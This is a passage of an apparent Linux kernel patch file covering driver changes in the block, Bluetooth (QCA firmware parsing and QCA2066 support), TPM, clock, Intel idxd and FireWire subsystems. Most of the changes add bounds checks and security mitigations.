+ 	struct inode *inode = bdev->bd_inode;
+ 	int err;
+ 
+@@ -110,7 +110,8 @@ static int blk_ioctl_discard(struct block_device *bdev, fmode_t mode,
+ 	if (len & 511)
+ 		return -EINVAL;
+ 
+-	if (start + len > bdev_nr_bytes(bdev))
++	if (check_add_overflow(start, len, &end) ||
++	    end > bdev_nr_bytes(bdev))
+ 		return -EINVAL;
+ 
+ 	filemap_invalidate_lock(inode->i_mapping);
+diff --git a/drivers/ata/sata_gemini.c b/drivers/ata/sata_gemini.c
+index c96fcf9ee3c07..01f050b1bc93b 100644
+--- a/drivers/ata/sata_gemini.c
++++ b/drivers/ata/sata_gemini.c
+@@ -201,7 +201,10 @@ int gemini_sata_start_bridge(struct sata_gemini *sg, unsigned int bridge)
+ 		pclk = sg->sata0_pclk;
+ 	else
+ 		pclk = sg->sata1_pclk;
+-	clk_enable(pclk);
++	ret = clk_enable(pclk);
++	if (ret)
++		return ret;
++
+ 	msleep(10);
+ 
+ 	/* Do not keep clocking a bridge that is not online */
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 5277090c6d6d7..a0fadde993d70 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -99,7 +99,8 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ {
+ 	struct sk_buff *skb;
+ 	struct edl_event_hdr *edl;
+-	char cmd, build_label[QCA_FW_BUILD_VER_LEN];
++	char *build_label;
++	char cmd;
+ 	int build_lbl_len, err = 0;
+ 
+ 	bt_dev_dbg(hdev, "QCA read fw build info");
+@@ -114,6 +115,11 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 		return err;
+ 	}
+ 
++	if (skb->len < sizeof(*edl)) {
++		err = -EILSEQ;
++		goto out;
++	}
++
+ 	edl = (struct edl_event_hdr *)(skb->data);
+ 	if (!edl) {
+ 		bt_dev_err(hdev, "QCA read fw build info with no header");
+@@ -129,14 +135,25 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 		goto out;
+ 	}
+ 
++	if (skb->len < sizeof(*edl) + 1) {
++		err = -EILSEQ;
++		goto out;
++	}
++
+ 	build_lbl_len = edl->data[0];
+-	if (build_lbl_len <= QCA_FW_BUILD_VER_LEN - 1) {
+-		memcpy(build_label, edl->data + 1, build_lbl_len);
+-		*(build_label + build_lbl_len) = '\0';
++
++	if (skb->len < sizeof(*edl) + 1 + build_lbl_len) {
++		err = -EILSEQ;
++		goto out;
+ 	}
+ 
++	build_label = kstrndup(&edl->data[1], build_lbl_len, GFP_KERNEL);
++	if (!build_label)
++		goto out;
++
+ 	hci_set_fw_info(hdev, "%s", build_label);
+ 
++	kfree(build_label);
+ out:
+ 	kfree_skb(skb);
+ 	return err;
+@@ -205,6 +222,49 @@ static int qca_send_reset(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int qca_read_fw_board_id(struct hci_dev *hdev, u16 *bid)
++{
++	u8 cmd;
++	struct sk_buff *skb;
++	struct edl_event_hdr *edl;
++	int err = 0;
++
++	cmd = EDL_GET_BID_REQ_CMD;
++	skb = __hci_cmd_sync_ev(hdev, EDL_PATCH_CMD_OPCODE, EDL_PATCH_CMD_LEN,
++				&cmd, 0, HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		err = PTR_ERR(skb);
++		bt_dev_err(hdev, "Reading QCA board ID failed (%d)", err);
++		return err;
++	}
++
++	edl = skb_pull_data(skb, sizeof(*edl));
++	if (!edl) {
++		bt_dev_err(hdev, "QCA read board ID with no header");
++		err = -EILSEQ;
++		goto out;
++	}
++
++	if (edl->cresp != EDL_CMD_REQ_RES_EVT ||
++	    edl->rtype != EDL_GET_BID_REQ_CMD) {
++		bt_dev_err(hdev, "QCA Wrong packet: %d %d", edl->cresp, edl->rtype);
++		err = -EIO;
++		goto out;
++	}
++
++	if (skb->len < 3) {
++		err = -EILSEQ;
++		goto out;
++	}
++
++	*bid = (edl->data[1] << 8) + edl->data[2];
++	bt_dev_dbg(hdev, "%s: bid = %x", __func__, *bid);
++
++out:
++	kfree_skb(skb);
++	return err;
++}
++
+ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ {
+ 	struct sk_buff *skb;
+@@ -227,9 +287,10 @@ int qca_send_pre_shutdown_cmd(struct hci_dev *hdev)
+ }
+ EXPORT_SYMBOL_GPL(qca_send_pre_shutdown_cmd);
+ 
+-static void qca_tlv_check_data(struct hci_dev *hdev,
++static int qca_tlv_check_data(struct hci_dev *hdev,
+ 			       struct qca_fw_config *config,
+-		u8 *fw_data, enum qca_btsoc_type soc_type)
++			       u8 *fw_data, size_t fw_size,
++			       enum qca_btsoc_type soc_type)
+ {
+ 	const u8 *data;
+ 	u32 type_len;
+@@ -239,12 +300,16 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 	struct tlv_type_patch *tlv_patch;
+ 	struct tlv_type_nvm *tlv_nvm;
+ 	uint8_t nvm_baud_rate = config->user_baud_rate;
++	u8 type;
+ 
+ 	config->dnld_mode = QCA_SKIP_EVT_NONE;
+ 	config->dnld_type = QCA_SKIP_EVT_NONE;
+ 
+ 	switch (config->type) {
+ 	case ELF_TYPE_PATCH:
++		if (fw_size < 7)
++			return -EINVAL;
++
+ 		config->dnld_mode = QCA_SKIP_EVT_VSE_CC;
+ 		config->dnld_type = QCA_SKIP_EVT_VSE_CC;
+ 
+@@ -253,6 +318,9 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 		bt_dev_dbg(hdev, "File version      : 0x%x", fw_data[6]);
+ 		break;
+ 	case TLV_TYPE_PATCH:
++		if (fw_size < sizeof(struct tlv_type_hdr) + sizeof(struct tlv_type_patch))
++			return -EINVAL;
++
+ 		tlv = (struct tlv_type_hdr *)fw_data;
+ 		type_len = le32_to_cpu(tlv->type_len);
+ 		tlv_patch = (struct tlv_type_patch *)tlv->data;
+@@ -292,25 +360,56 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 		break;
+ 
+ 	case TLV_TYPE_NVM:
++		if (fw_size < sizeof(struct tlv_type_hdr))
++			return -EINVAL;
++
+ 		tlv = (struct tlv_type_hdr *)fw_data;
+ 
+ 		type_len = le32_to_cpu(tlv->type_len);
+-		length = (type_len >> 8) & 0x00ffffff;
++		length = type_len >> 8;
++		type = type_len & 0xff;
+ 
+-		BT_DBG("TLV Type\t\t : 0x%x", type_len & 0x000000ff);
++		/* Some NVM files have more than one set of tags, only parse
++		 * the first set when it has type 2 for now. When there is
++		 * more than one set there is an enclosing header of type 4.
++		 */
++		if (type == 4) {
++			if (fw_size < 2 * sizeof(struct tlv_type_hdr))
++				return -EINVAL;
++
++			tlv++;
++
++			type_len = le32_to_cpu(tlv->type_len);
++			length = type_len >> 8;
++			type = type_len & 0xff;
++		}
++
++		BT_DBG("TLV Type\t\t : 0x%x", type);
+ 		BT_DBG("Length\t\t : %d bytes", length);
+ 
++		if (type != 2)
++			break;
++
++		if (fw_size < length + (tlv->data - fw_data))
++			return -EINVAL;
++
+ 		idx = 0;
+ 		data = tlv->data;
+-		while (idx < length) {
++		while (idx < length - sizeof(struct tlv_type_nvm)) {
+ 			tlv_nvm = (struct tlv_type_nvm *)(data + idx);
+ 
+ 			tag_id = le16_to_cpu(tlv_nvm->tag_id);
+ 			tag_len = le16_to_cpu(tlv_nvm->tag_len);
+ 
++			if (length < idx + sizeof(struct tlv_type_nvm) + tag_len)
++				return -EINVAL;
++
+ 			/* Update NVM tags as needed */
+ 			switch (tag_id) {
+ 			case EDL_TAG_ID_HCI:
++				if (tag_len < 3)
++					return -EINVAL;
++
+ 				/* HCI transport layer parameters
+ 				 * enabling software inband sleep
+ 				 * onto controller side.
+@@ -326,6 +425,9 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 				break;
+ 
+ 			case EDL_TAG_ID_DEEP_SLEEP:
++				if (tag_len < 1)
++					return -EINVAL;
++
+ 				/* Sleep enable mask
+ 				 * enabling deep sleep feature on controller.
+ 				 */
+@@ -334,14 +436,16 @@ static void qca_tlv_check_data(struct hci_dev *hdev,
+ 				break;
+ 			}
+ 
+-			idx += (sizeof(u16) + sizeof(u16) + 8 + tag_len);
++			idx += sizeof(struct tlv_type_nvm) + tag_len;
+ 		}
+ 		break;
+ 
+ 	default:
+ 		BT_ERR("Unknown TLV type %d", config->type);
+-		break;
++		return -EINVAL;
+ 	}
++
++	return 0;
+ }
+ 
+ static int qca_tlv_send_segment(struct hci_dev *hdev, int seg_size,
+@@ -491,7 +595,9 @@ static int qca_download_firmware(struct hci_dev *hdev,
+ 	memcpy(data, fw->data, size);
+ 	release_firmware(fw);
+ 
+-	qca_tlv_check_data(hdev, config, data, soc_type);
++	ret = qca_tlv_check_data(hdev, config, data, size, soc_type);
++	if (ret)
++		goto out;
+ 
+ 	segment = data;
+ 	remain = size;
+@@ -574,6 +680,23 @@ int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ }
+ EXPORT_SYMBOL_GPL(qca_set_bdaddr_rome);
+ 
++static void qca_generate_hsp_nvm_name(char *fwname, size_t max_size,
++		struct qca_btsoc_version ver, u8 rom_ver, u16 bid)
++{
++	const char *variant;
++
++	/* hsp gf chip */
++	if ((le32_to_cpu(ver.soc_id) & QCA_HSP_GF_SOC_MASK) == QCA_HSP_GF_SOC_ID)
++		variant = "g";
++	else
++		variant = "";
++
++	if (bid == 0x0)
++		snprintf(fwname, max_size, "qca/hpnv%02x%s.bin", rom_ver, variant);
++	else
++		snprintf(fwname, max_size, "qca/hpnv%02x%s.%x", rom_ver, variant, bid);
++}
++
+ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		   enum qca_btsoc_type soc_type, struct qca_btsoc_version ver,
+ 		   const char *firmware_name)
+@@ -582,6 +705,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	int err;
+ 	u8 rom_ver = 0;
+ 	u32 soc_ver;
++	u16 boardid = 0;
+ 
+ 	bt_dev_dbg(hdev, "QCA setup on UART");
+ 
+@@ -615,6 +739,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/apbtfw%02x.tlv", rom_ver);
+ 		break;
++	case QCA_QCA2066:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/hpbtfw%02x.tlv", rom_ver);
++		break;
+ 	case QCA_QCA6390:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/htbtfw%02x.tlv", rom_ver);
+@@ -649,6 +777,9 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	/* Give the controller some time to get ready to receive the NVM */
+ 	msleep(10);
+ 
++	if (soc_type == QCA_QCA2066)
++		qca_read_fw_board_id(hdev, &boardid);
++
+ 	/* Download NVM configuration */
+ 	config.type = TLV_TYPE_NVM;
+ 	if (firmware_name) {
+@@ -671,6 +802,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 			snprintf(config.fwname, sizeof(config.fwname),
+ 				 "qca/apnv%02x.bin", rom_ver);
+ 			break;
++		case QCA_QCA2066:
++			qca_generate_hsp_nvm_name(config.fwname,
++				sizeof(config.fwname), ver, rom_ver, boardid);
++			break;
+ 		case QCA_QCA6390:
+ 			snprintf(config.fwname, sizeof(config.fwname),
+ 				 "qca/htnv%02x.bin", rom_ver);
+@@ -702,6 +837,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 
+ 	switch (soc_type) {
+ 	case QCA_WCN3991:
++	case QCA_QCA2066:
+ 	case QCA_QCA6390:
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 03bff5c0059de..38e2fbc950248 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -12,6 +12,7 @@
+ #define EDL_PATCH_VER_REQ_CMD		(0x19)
+ #define EDL_PATCH_TLV_REQ_CMD		(0x1E)
+ #define EDL_GET_BUILD_INFO_CMD		(0x20)
++#define EDL_GET_BID_REQ_CMD			(0x23)
+ #define EDL_NVM_ACCESS_SET_REQ_CMD	(0x01)
+ #define EDL_PATCH_CONFIG_CMD		(0x28)
+ #define MAX_SIZE_PER_TLV_SEGMENT	(243)
+@@ -46,8 +47,8 @@
+ #define get_soc_ver(soc_id, rom_ver)	\
+ 	((le32_to_cpu(soc_id) << 16) | (le16_to_cpu(rom_ver)))
+ 
+-#define QCA_FW_BUILD_VER_LEN		255
+-
++#define QCA_HSP_GF_SOC_ID			0x1200
++#define QCA_HSP_GF_SOC_MASK			0x0000ff00
+ 
+ enum qca_baudrate {
+ 	QCA_BAUDRATE_115200 	= 0,
+@@ -146,6 +147,7 @@ enum qca_btsoc_type {
+ 	QCA_WCN3990,
+ 	QCA_WCN3998,
+ 	QCA_WCN3991,
++	QCA_QCA2066,
+ 	QCA_QCA6390,
+ 	QCA_WCN6750,
+ 	QCA_WCN6855,
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 179278b801eb3..a0e2b5d992695 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1808,6 +1808,10 @@ static int qca_setup(struct hci_uart *hu)
+ 	set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+ 
+ 	switch (soc_type) {
++	case QCA_QCA2066:
++		soc_name = "qca2066";
++		break;
++
+ 	case QCA_WCN3988:
+ 	case QCA_WCN3990:
+ 	case QCA_WCN3991:
+@@ -2000,6 +2004,11 @@ static const struct qca_device_data qca_soc_data_wcn3998 __maybe_unused = {
+ 	.num_vregs = 4,
+ };
+ 
++static const struct qca_device_data qca_soc_data_qca2066 __maybe_unused = {
++	.soc_type = QCA_QCA2066,
++	.num_vregs = 0,
++};
++
+ static const struct qca_device_data qca_soc_data_qca6390 __maybe_unused = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
+@@ -2539,6 +2548,7 @@ static SIMPLE_DEV_PM_OPS(qca_pm_ops, qca_suspend, qca_resume);
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id qca_bluetooth_of_match[] = {
++	{ .compatible = "qcom,qca2066-bt", .data = &qca_soc_data_qca2066},
+ 	{ .compatible = "qcom,qca6174-bt" },
+ 	{ .compatible = "qcom,qca6390-bt", .data = &qca_soc_data_qca6390},
+ 	{ .compatible = "qcom,qca9377-bt" },
+@@ -2556,6 +2566,7 @@ MODULE_DEVICE_TABLE(of, qca_bluetooth_of_match);
+ 
+ #ifdef CONFIG_ACPI
+ static const struct acpi_device_id qca_bluetooth_acpi_match[] = {
++	{ "QCOM2066", (kernel_ulong_t)&qca_soc_data_qca2066 },
+ 	{ "QCOM6390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+ 	{ "DLA16390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+ 	{ "DLB16390", (kernel_ulong_t)&qca_soc_data_qca6390 },
+diff --git a/drivers/char/tpm/tpm-dev-common.c b/drivers/char/tpm/tpm-dev-common.c
+index dc4c0a0a51290..30b4c288c1bbc 100644
+--- a/drivers/char/tpm/tpm-dev-common.c
++++ b/drivers/char/tpm/tpm-dev-common.c
+@@ -155,7 +155,7 @@ ssize_t tpm_common_read(struct file *file, char __user *buf,
+ out:
+ 	if (!priv->response_length) {
+ 		*off = 0;
+-		del_singleshot_timer_sync(&priv->user_read_timer);
++		del_timer_sync(&priv->user_read_timer);
+ 		flush_work(&priv->timeout_work);
+ 	}
+ 	mutex_unlock(&priv->buffer_mutex);
+@@ -262,7 +262,7 @@ __poll_t tpm_common_poll(struct file *file, poll_table *wait)
+ void tpm_common_release(struct file *file, struct file_priv *priv)
+ {
+ 	flush_work(&priv->async_work);
+-	del_singleshot_timer_sync(&priv->user_read_timer);
++	del_timer_sync(&priv->user_read_timer);
+ 	flush_work(&priv->timeout_work);
+ 	file->private_data = NULL;
+ 	priv->response_length = 0;
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index fe1d45eac837c..8ecbb8f494655 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -4435,7 +4435,8 @@ void clk_unregister(struct clk *clk)
+ 	if (ops == &clk_nodrv_ops) {
+ 		pr_err("%s: unregistered clock: %s\n", __func__,
+ 		       clk->core->name);
+-		goto unlock;
++		clk_prepare_unlock();
++		return;
+ 	}
+ 	/*
+ 	 * Assign empty clock ops for consumers that might still hold
+@@ -4469,11 +4470,10 @@ void clk_unregister(struct clk *clk)
+ 	if (clk->core->protect_count)
+ 		pr_warn("%s: unregistering protected clock: %s\n",
+ 					__func__, clk->core->name);
++	clk_prepare_unlock();
+ 
+ 	kref_put(&clk->core->ref, __clk_release);
+ 	free_clk(clk);
+-unlock:
+-	clk_prepare_unlock();
+ }
+ EXPORT_SYMBOL_GPL(clk_unregister);
+ 
+@@ -4632,13 +4632,11 @@ void __clk_put(struct clk *clk)
+ 	if (clk->min_rate > 0 || clk->max_rate < ULONG_MAX)
+ 		clk_set_rate_range_nolock(clk, 0, ULONG_MAX);
+ 
+-	owner = clk->core->owner;
+-	kref_put(&clk->core->ref, __clk_release);
+-
+ 	clk_prepare_unlock();
+ 
++	owner = clk->core->owner;
++	kref_put(&clk->core->ref, __clk_release);
+ 	module_put(owner);
+-
+ 	free_clk(clk);
+ }
+ 
+diff --git a/drivers/clk/sunxi-ng/ccu-sun50i-h6.c b/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
+index 42568c6161814..892df807275c8 100644
+--- a/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
++++ b/drivers/clk/sunxi-ng/ccu-sun50i-h6.c
+@@ -1181,11 +1181,18 @@ static const u32 usb2_clk_regs[] = {
+ 	SUN50I_H6_USB3_CLK_REG,
+ };
+ 
++static struct ccu_mux_nb sun50i_h6_cpu_nb = {
++	.common		= &cpux_clk.common,
++	.cm		= &cpux_clk.mux,
++	.delay_us       = 1,
++	.bypass_index   = 0, /* index of 24 MHz oscillator */
++};
++
+ static int sun50i_h6_ccu_probe(struct platform_device *pdev)
+ {
+ 	void __iomem *reg;
++	int i, ret;
+ 	u32 val;
+-	int i;
+ 
+ 	reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(reg))
+@@ -1252,7 +1259,15 @@ static int sun50i_h6_ccu_probe(struct platform_device *pdev)
+ 	val |= BIT(24);
+ 	writel(val, reg + SUN50I_H6_HDMI_CEC_CLK_REG);
+ 
+-	return devm_sunxi_ccu_probe(&pdev->dev, reg, &sun50i_h6_ccu_desc);
++	ret = devm_sunxi_ccu_probe(&pdev->dev, reg, &sun50i_h6_ccu_desc);
++	if (ret)
++		return ret;
++
++	/* Reparent CPU during PLL CPUX rate changes */
++	ccu_mux_notifier_register(pll_cpux_clk.common.hw.clk,
++				  &sun50i_h6_cpu_nb);
++
++	return 0;
+ }
+ 
+ static const struct of_device_id sun50i_h6_ccu_ids[] = {
+diff --git a/drivers/dma/idxd/cdev.c b/drivers/dma/idxd/cdev.c
+index a9b96b18772f3..9f8adb7013eba 100644
+--- a/drivers/dma/idxd/cdev.c
++++ b/drivers/dma/idxd/cdev.c
+@@ -198,6 +198,18 @@ static int idxd_cdev_mmap(struct file *filp, struct vm_area_struct *vma)
+ 	int rc;
+ 
+ 	dev_dbg(&pdev->dev, "%s called\n", __func__);
++
++	/*
++	 * Due to an erratum in some of the devices supported by the driver,
++	 * direct user submission to the device can be unsafe.
++	 * (See the INTEL-SA-01084 security advisory)
++	 *
++	 * For the devices that exhibit this behavior, require that the user
++	 * has CAP_SYS_RAWIO capabilities.
++	 */
++	if (!idxd->user_submission_safe && !capable(CAP_SYS_RAWIO))
++		return -EPERM;
++
+ 	rc = check_vma(wq, vma, __func__);
+ 	if (rc < 0)
+ 		return rc;
+@@ -212,6 +224,70 @@ static int idxd_cdev_mmap(struct file *filp, struct vm_area_struct *vma)
+ 			vma->vm_page_prot);
+ }
+ 
++static int idxd_submit_user_descriptor(struct idxd_user_context *ctx,
++				       struct dsa_hw_desc __user *udesc)
++{
++	struct idxd_wq *wq = ctx->wq;
++	struct idxd_dev *idxd_dev = &wq->idxd->idxd_dev;
++	const uint64_t comp_addr_align = is_dsa_dev(idxd_dev) ? 0x20 : 0x40;
++	void __iomem *portal = idxd_wq_portal_addr(wq);
++	struct dsa_hw_desc descriptor __aligned(64);
++	int rc;
++
++	rc = copy_from_user(&descriptor, udesc, sizeof(descriptor));
++	if (rc)
++		return -EFAULT;
++
++	/*
++	 * DSA devices are capable of indirect ("batch") command submission.
++	 * On devices where direct user submissions are not safe, we cannot
++	 * allow this since there is no good way for us to verify these
++	 * indirect commands.
++	 */
++	if (is_dsa_dev(idxd_dev) && descriptor.opcode == DSA_OPCODE_BATCH &&
++		!wq->idxd->user_submission_safe)
++		return -EINVAL;
++	/*
++	 * As per the programming specification, the completion address must be
++	 * aligned to 32 or 64 bytes. If this is violated the hardware
++	 * engine can get very confused (security issue).
++	 */
++	if (!IS_ALIGNED(descriptor.completion_addr, comp_addr_align))
++		return -EINVAL;
++
++	if (wq_dedicated(wq))
++		iosubmit_cmds512(portal, &descriptor, 1);
++	else {
++		descriptor.priv = 0;
++		descriptor.pasid = ctx->pasid;
++		rc = idxd_enqcmds(wq, portal, &descriptor);
++		if (rc < 0)
++			return rc;
++	}
++
++	return 0;
++}
++
++static ssize_t idxd_cdev_write(struct file *filp, const char __user *buf, size_t len,
++			       loff_t *unused)
++{
++	struct dsa_hw_desc __user *udesc = (struct dsa_hw_desc __user *)buf;
++	struct idxd_user_context *ctx = filp->private_data;
++	ssize_t written = 0;
++	int i;
++
++	for (i = 0; i < len/sizeof(struct dsa_hw_desc); i++) {
++		int rc = idxd_submit_user_descriptor(ctx, udesc + i);
++
++		if (rc)
++			return written ? written : rc;
++
++		written += sizeof(struct dsa_hw_desc);
++	}
++
++	return written;
++}
++
+ static __poll_t idxd_cdev_poll(struct file *filp,
+ 			       struct poll_table_struct *wait)
+ {
+@@ -234,6 +310,7 @@ static const struct file_operations idxd_cdev_fops = {
+ 	.open = idxd_cdev_open,
+ 	.release = idxd_cdev_release,
+ 	.mmap = idxd_cdev_mmap,
++	.write = idxd_cdev_write,
+ 	.poll = idxd_cdev_poll,
+ };
+ 
+diff --git a/drivers/dma/idxd/idxd.h b/drivers/dma/idxd/idxd.h
+index 7ced8d283d98b..14c6ef987fede 100644
+--- a/drivers/dma/idxd/idxd.h
++++ b/drivers/dma/idxd/idxd.h
+@@ -258,6 +258,7 @@ struct idxd_driver_data {
+ 	struct device_type *dev_type;
+ 	int compl_size;
+ 	int align;
++	bool user_submission_safe;
+ };
+ 
+ struct idxd_device {
+@@ -316,6 +317,8 @@ struct idxd_device {
+ 	struct idxd_pmu *idxd_pmu;
+ 
+ 	unsigned long *opcap_bmap;
++
++	bool user_submission_safe;
+ };
+ 
+ /* IDXD software descriptor */
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index e0f49545d89ff..30193195c8133 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -48,6 +48,7 @@ static struct idxd_driver_data idxd_driver_data[] = {
+ 		.compl_size = sizeof(struct dsa_completion_record),
+ 		.align = 32,
+ 		.dev_type = &dsa_device_type,
++		.user_submission_safe = false, /* See INTEL-SA-01084 security advisory */
+ 	},
+ 	[IDXD_TYPE_IAX] = {
+ 		.name_prefix = "iax",
+@@ -55,6 +56,7 @@ static struct idxd_driver_data idxd_driver_data[] = {
+ 		.compl_size = sizeof(struct iax_completion_record),
+ 		.align = 64,
+ 		.dev_type = &iax_device_type,
++		.user_submission_safe = false, /* See INTEL-SA-01084 security advisory */
+ 	},
+ };
+ 
+@@ -663,6 +665,8 @@ static int idxd_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	dev_info(&pdev->dev, "Intel(R) Accelerator Device (v%x)\n",
+ 		 idxd->hw.version);
+ 
++	idxd->user_submission_safe = data->user_submission_safe;
++
+ 	return 0;
+ 
+  err_dev_register:
+diff --git a/drivers/dma/idxd/registers.h b/drivers/dma/idxd/registers.h
+index fe3b8d04f9db1..fdfe7930f1834 100644
+--- a/drivers/dma/idxd/registers.h
++++ b/drivers/dma/idxd/registers.h
+@@ -4,9 +4,6 @@
+ #define _IDXD_REGISTERS_H_
+ 
+ /* PCI Config */
+-#define PCI_DEVICE_ID_INTEL_DSA_SPR0	0x0b25
+-#define PCI_DEVICE_ID_INTEL_IAX_SPR0	0x0cfe
+-
+ #define DEVICE_VERSION_1		0x100
+ #define DEVICE_VERSION_2		0x200
+ 
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 6e1e14b376e65..c811757d0f97f 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -1162,12 +1162,35 @@ static ssize_t wq_enqcmds_retries_store(struct device *dev, struct device_attrib
+ static struct device_attribute dev_attr_wq_enqcmds_retries =
+ 		__ATTR(enqcmds_retries, 0644, wq_enqcmds_retries_show, wq_enqcmds_retries_store);
+ 
++static ssize_t op_cap_show_common(struct device *dev, char *buf, unsigned long *opcap_bmap)
++{
++	ssize_t pos;
++	int i;
++
++	pos = 0;
++	for (i = IDXD_MAX_OPCAP_BITS/64 - 1; i >= 0; i--) {
++		unsigned long val = opcap_bmap[i];
++
++		/* On systems where direct user submissions are not safe, we need to clear out
++		 * the BATCH capability from the capability mask in sysfs since we cannot support
++		 * that command on such systems.
++		 */
++		if (i == DSA_OPCODE_BATCH/64 && !confdev_to_idxd(dev)->user_submission_safe)
++			clear_bit(DSA_OPCODE_BATCH % 64, &val);
++
++		pos += sysfs_emit_at(buf, pos, "%*pb", 64, &val);
++		pos += sysfs_emit_at(buf, pos, "%c", i == 0 ? '\n' : ',');
++	}
++
++	return pos;
++}
++
+ static ssize_t wq_op_config_show(struct device *dev,
+ 				 struct device_attribute *attr, char *buf)
+ {
+ 	struct idxd_wq *wq = confdev_to_wq(dev);
+ 
+-	return sysfs_emit(buf, "%*pb\n", IDXD_MAX_OPCAP_BITS, wq->opcap_bmap);
++	return op_cap_show_common(dev, buf, wq->opcap_bmap);
+ }
+ 
+ static int idxd_verify_supported_opcap(struct idxd_device *idxd, unsigned long *opmask)
+@@ -1381,7 +1404,7 @@ static ssize_t op_cap_show(struct device *dev,
+ {
+ 	struct idxd_device *idxd = confdev_to_idxd(dev);
+ 
+-	return sysfs_emit(buf, "%*pb\n", IDXD_MAX_OPCAP_BITS, idxd->opcap_bmap);
++	return op_cap_show_common(dev, buf, idxd->opcap_bmap);
+ }
+ static DEVICE_ATTR_RO(op_cap);
+ 
+diff --git a/drivers/firewire/nosy.c b/drivers/firewire/nosy.c
+index b0d671db178a8..ea31ac7ac1ca9 100644
+--- a/drivers/firewire/nosy.c
++++ b/drivers/firewire/nosy.c
+@@ -148,10 +148,12 @@ packet_buffer_get(struct client *client, char __user *data, size_t user_length)
+ 	if (atomic_read(&buffer->size) == 0)
+ 		return -ENODEV;
+ 
+-	/* FIXME: Check length <= user_length. */
++	length = buffer->head->length;
++
++	if (length > user_length)
++		return 0;
+ 
+ 	end = buffer->data + buffer->capacity;
+-	length = buffer->head->length;
+ 
+ 	if (&buffer->head->data[length] < end) {
+ 		if (copy_to_user(data, buffer->head->data, length))
+diff --git a/drivers/firewire/ohci.c b/drivers/firewire/ohci.c
+index 667ff40f39353..7d94e1cbc0ed3 100644
+--- a/drivers/firewire/ohci.c
++++ b/drivers/firewire/ohci.c
+@@ -2049,6 +2049,8 @@ static void bus_reset_work(struct work_struct *work)
+ 
+ 	ohci->generation = generation;
+ 	reg_write(ohci, OHCI1394_IntEventClear, OHCI1394_busReset);
++	if (param_debug & OHCI_PARAM_DEBUG_BUSRESETS)
++		reg_write(ohci, OHCI1394_IntMaskSet, OHCI1394_busReset);
+ 
+ 	if (ohci->quirks & QUIRK_RESET_PACKET)
+ 		ohci->request_generation = generation;
+@@ -2115,12 +2117,14 @@ static irqreturn_t irq_handler(int irq, void *data)
+ 		return IRQ_NONE;
+ 
+ 	/*
+-	 * busReset and postedWriteErr must not be cleared yet
++	 * busReset and postedWriteErr events must not be cleared yet
+ 	 * (OHCI 1.1 clauses 7.2.3.2 and 13.2.8.1)
+ 	 */
+ 	reg_write(ohci, OHCI1394_IntEventClear,
+ 		  event & ~(OHCI1394_busReset | OHCI1394_postedWriteErr));
+ 	log_irqs(ohci, event);
++	if (event & OHCI1394_busReset)
++		reg_write(ohci, OHCI1394_IntMaskClear, OHCI1394_busReset);
+ 
+ 	if (event & OHCI1394_selfIDComplete)
+ 		queue_work(selfid_workqueue, &ohci->bus_reset_work);
+diff --git a/drivers/gpio/gpio-crystalcove.c b/drivers/gpio/gpio-crystalcove.c
+index 1ee62cd58582b..25db014494a4d 100644
+--- a/drivers/gpio/gpio-crystalcove.c
++++ b/drivers/gpio/gpio-crystalcove.c
+@@ -92,7 +92,7 @@ static inline int to_reg(int gpio, enum ctrl_register reg_type)
+ 		case 0x5e:
+ 			return GPIOPANELCTL;
+ 		default:
+-			return -EOPNOTSUPP;
++			return -ENOTSUPP;
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpio/gpio-wcove.c b/drivers/gpio/gpio-wcove.c
+index c18b6b47384f1..94ca9d03c0949 100644
+--- a/drivers/gpio/gpio-wcove.c
++++ b/drivers/gpio/gpio-wcove.c
+@@ -104,7 +104,7 @@ static inline int to_reg(int gpio, enum ctrl_register type)
